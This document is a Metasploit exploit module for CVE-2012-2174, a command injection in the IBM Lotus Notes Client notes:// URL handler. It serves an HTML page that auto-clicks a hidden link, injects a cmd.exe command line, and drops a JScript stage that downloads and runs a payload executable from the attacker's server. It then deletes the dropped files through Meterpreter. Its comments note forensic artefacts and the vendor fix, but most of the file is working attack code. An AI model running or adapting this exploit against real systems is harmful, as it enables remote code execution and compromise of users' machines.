IBM Lotus Notes Client URL Handler Command Injection



##

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    # Browser-delivered exploit for CVE-2012-2174 in the IBM Lotus Notes Client
    # notes:// URL handler.  Everything this module does is visible below:
    #
    #   HTML page (on_request_uri) -> synthetic click on an empty notes:// link
    #   -> handler invoked with "-vm c:\windows\system32\cmd.exe -vmargs ..."
    #   -> cmd.exe echoes a JScript stage into %TEMP% and starts cscript on it
    #   -> the stage fetches "<random>.exe" from this server and runs it
    #   -> on_new_session removes both dropped files.
    #
    # Defensive notes (all grounded in the strings this module emits):
    #   * Artefacts: two two-letter random files in %TEMP%, "xx.js" and "xx.exe"
    #     (see exploit), and a GET for a random 3-8 letter "<name>.exe" resource
    #     under this module's URI on SRVHOST:SRVPORT.
    #   * Process lineage: the notes:// handler launching cmd.exe whose command
    #     line contains "echo ... > %TEMP%\\<x>.js& start cscript", followed by
    #     cscript.exe instantiating wscript.shell, Microsoft.XMLHTTP and
    #     ADODB.Stream.
    #   * Cleanup leaves its own trace: "attrib.exe -r" is run against each
    #     dropped file before it is removed (on_new_session).
    #   * Remediation is the vendor fix referenced below (IBM swg21598348); the
    #     Description gives the affected range as <= 8.5.3.
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpServer::HTML # HTTP listener; dispatches to on_request_uri
    include Msf::Exploit::EXE                      # generate_payload_exe
    include Msf::Exploit::FileDropper              # register_file_for_cleanup / @dropped_files

    # Module metadata.  OBFUSCATE is the only module-specific option; SRVHOST,
    # SRVPORT and SSL are inherited from the HttpServer mixin and read in
    # on_request_uri when the payload URL is assembled.
    #
    # @param info [Hash] framework-supplied module info, merged via update_info
    def initialize(info={})
        super(update_info(info,
            'Name'           => "IBM Lotus Notes Client URL Handler Command Injection",
            'Description'    => %q{
                    This modules exploits a command injection vulnerability in the URL handler for
                for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with
                an specially crafted notes:// URL to execute arbitrary commands with also arbitrary
                arguments. This module has been tested successfully on Windows XP SP3 with IE8,
                Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Moritz Jodeit', # Vulnerability discovery
                    'Sean de Regge', # Vulnerability analysis
                    'juan vazquez' # Metasploit
                ],
            'References'     =>
                [
                    [ 'CVE', '2012-2174' ],
                    [ 'OSVDB', '83063' ],
                    [ 'BID', '54070' ],
                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ],
                    [ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],
                    [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]
                ],
            # Size limit applies to the encoded payload that generate_payload_exe
            # embeds in the served .exe (see on_request_uri), not to the URL.
            'Payload'        =>
                {
                    'Space'           => 2048,
                    'StackAdjustment' => -3500
                },
            # 'migrate -k' moves the session out of the dropped .exe and kills
            # it -- presumably so on_new_session can delete that file; confirm.
            'DefaultOptions'  =>
                {
                    'EXITFUNC'         => "none",
                    'InitialAutoRunScript' => 'migrate -k -f'
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', {} ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => "Jun 18 2012",
            'DefaultTarget'  => 0))

        register_options(
            [
                OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
            ], self.class)
    end

    # Chooses the per-run names of the two files that will be dropped in the
    # victim's %TEMP%, then hands off to the HttpServer mixin (super), which
    # starts the listener and routes requests to on_request_uri.
    #
    # @return [void]
    def exploit
        @exe_name = rand_text_alpha(2) + ".exe" # downloaded payload executable
        @stage_name = rand_text_alpha(2) + ".js" # JScript downloader stage
        super
    end

    # Removes the files registered in on_request_uri once a session is up.
    # Overrides the FileDropper default because the files live under %TEMP% on
    # the victim: the path is expanded through the session, the read-only
    # attribute is cleared with attrib.exe, and only then the file is removed.
    #
    # Only the meterpreter branch returns true/false from the delete_if block;
    # for any other session type the block yields nil, so the entry is kept in
    # @dropped_files and nothing is deleted for that session.
    #
    # @param session [Msf::Session] the session that just opened
    # @return [void]
    def on_new_session(session)
        if session.type == "meterpreter"
            # session.fs.file below requires the stdapi extension.
            session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
        end

        @dropped_files.delete_if do |file|
            # "\\\\" is the two-character string \\, which gsub's replacement
            # syntax turns into a single literal backslash: '/' -> '\'.
            win_file = file.gsub("/", "\\\\")
            if session.type == "meterpreter"
                begin
                    wintemp = session.fs.file.expand_path("%TEMP%")
                    win_file = "#{wintemp}\\#{win_file}"
                    # Meterpreter should do this automatically as part of
                    # fs.file.rm().  Until that has been implemented, remove the
                    # read-only flag with a command.
                    session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
                    session.fs.file.rm(win_file)
                    print_good("Deleted #{file}")
                    true # drop the entry from @dropped_files
                rescue ::Rex::Post::Meterpreter::RequestError
                    print_error("Failed to delete #{win_file}")
                    false # keep the entry so the failure is not silently forgotten
                end

            end
        end

    end

    # HTTP handler for both requests the served page produces.
    #
    # 1. A path ending in .exe is the fetch made by the JScript stage: the
    #    payload executable is generated and served, and both dropped files are
    #    registered for cleanup (guarded so repeat fetches add no duplicates).
    # 2. Any other request -- there is no path or User-Agent check -- gets the
    #    landing page: an empty <a> whose href is a notes:// URL carrying
    #    "-vm cmd.exe -vmargs <command line>", clicked from body onload by a
    #    small clickLink() helper.
    #
    # @param cli [Rex::Proto::Http::ServerClient] connected client
    # @param request [Rex::Proto::Http::Request] the incoming request
    # @return [void]
    def on_request_uri(cli, request)

        if request.uri =~ /\.exe$/
            # regenerate_payload yields nil when no payload could be built for this client.
            return if ((p=regenerate_payload(cli))==nil)
            # include? guards keep the cleanup list free of duplicates when the
            # stage fetches the .exe more than once.
            register_file_for_cleanup("#{@stage_name}") unless @dropped_files and @dropped_files.include?("#{@stage_name}")
            register_file_for_cleanup("#{@exe_name}") unless @dropped_files and @dropped_files.include?("#{@exe_name}")
            data = generate_payload_exe({:code=>p.encoded})
            print_status("Sending payload")
            send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
            return
        end

        # When bound to every interface, advertise the address the client
        # actually reached us on instead of 0.0.0.0.
        my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
        if datastore['SSL']
            schema = "https"
        else
            schema = "http"
        end
        uri = "#{schema}://#{my_host}"
        # Random 3-8 letter resource name; matched by the /\.exe$/ branch above.
        uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe"

        # JScript stage executed by cscript on the victim: change to %TEMP%,
        # fetch the .exe over XMLHTTP, write it with ADODB.Stream
        # (Mode=3 read/write, Type=1 binary, SaveToFile option 2 = overwrite)
        # and run it.  Ruby turns "\\%" into \% in the emitted source, so the
        # echoed text reads '\%TEMP\%'; JScript reads the unknown escape \% as
        # a plain %.
        script = "var w=new ActiveXObject('wscript.shell');"
        script << "w.CurrentDirectory=w.ExpandEnvironmentStrings('\\%TEMP\\%');"
        script << "var x=new ActiveXObject('Microsoft.XMLHTTP');"
        script << "x.open('GET','#{uri}', false);"
        script << "x.send();"
        script << "var s=new ActiveXObject('ADODB.Stream');"
        script << "s.Mode=3;"
        script << "s.Type=1;"
        script << "s.Open();"
        script << "s.Write(x.responseBody);"
        script << "s.SaveToFile('#{@exe_name}',2);"
        script << "w.Run('#{@exe_name}');"

        # cmd.exe command line passed through -vmargs: /q (echo off) /s (quote
        # handling) /c (run and exit); echo writes the stage to %TEMP%, start
        # launches cscript on it, and the trailing REM turns anything appended
        # after this point into a comment -- presumably whatever the handler
        # adds; confirm.  "\\\\" in this Ruby string is \\ in the command line.
        vmargs = "/q /s /c echo #{script} > %TEMP%\\\\#{@stage_name}& start cscript %TEMP%\\\\#{@stage_name}& REM"

        # Random element id so the page does not carry a fixed marker.
        link_id = rand_text_alpha(5 + rand(5))

        # Helper that fires a click on the anchor from body onload; falls back
        # to fireEvent for browsers without createEvent and finally assigns
        # window.location if the click was not cancelled.
        js_click_link = %Q|
        function clickLink(link) {
            var cancelled = false;

            if (document.createEvent) {
                var event = document.createEvent("MouseEvents");
                event.initMouseEvent("click", true, true, window,
                    0, 0, 0, 0, 0,
                    false, false, false, false,
                    0, null);
                cancelled = !link.dispatchEvent(event);
            }
            else if (link.fireEvent) {
                cancelled = !link.fireEvent("onclick");
            }

            if (!cancelled) {
                window.location = link.href;
            }
        }
        |

        # Optional obfuscation renames the function, so its post-obfuscation
        # name has to be looked up with sym() for the onload handler.
        if datastore['OBFUSCATE']
            js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)
            js_click_link.obfuscate
            js_click_link_fn = js_click_link.sym('clickLink')
        else
            js_click_link_fn = 'clickLink'
        end


        # Landing page.  The anchor has no text (nothing visible to the user);
        # the host and path parts of the notes:// URL are random, -vm points the
        # handler at cmd.exe and -vmargs is the command line built above.
        # <<-EOS keeps the leading indentation in the served HTML.
        html = <<-EOS
        <html>
        <head>
        <script>
        #{js_click_link}
        </script>
        </head>
        <body onload="#{js_click_link_fn}(document.getElementById('#{link_id}'));">
        <a id="#{link_id}" href="notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\windows\\system32\\cmd.exe -vmargs #{vmargs}"></a>
        </body>
        </html>
        EOS

        print_status("Sending html")
        send_response(cli, html, {'Content-Type'=>'text/html'})

    end

end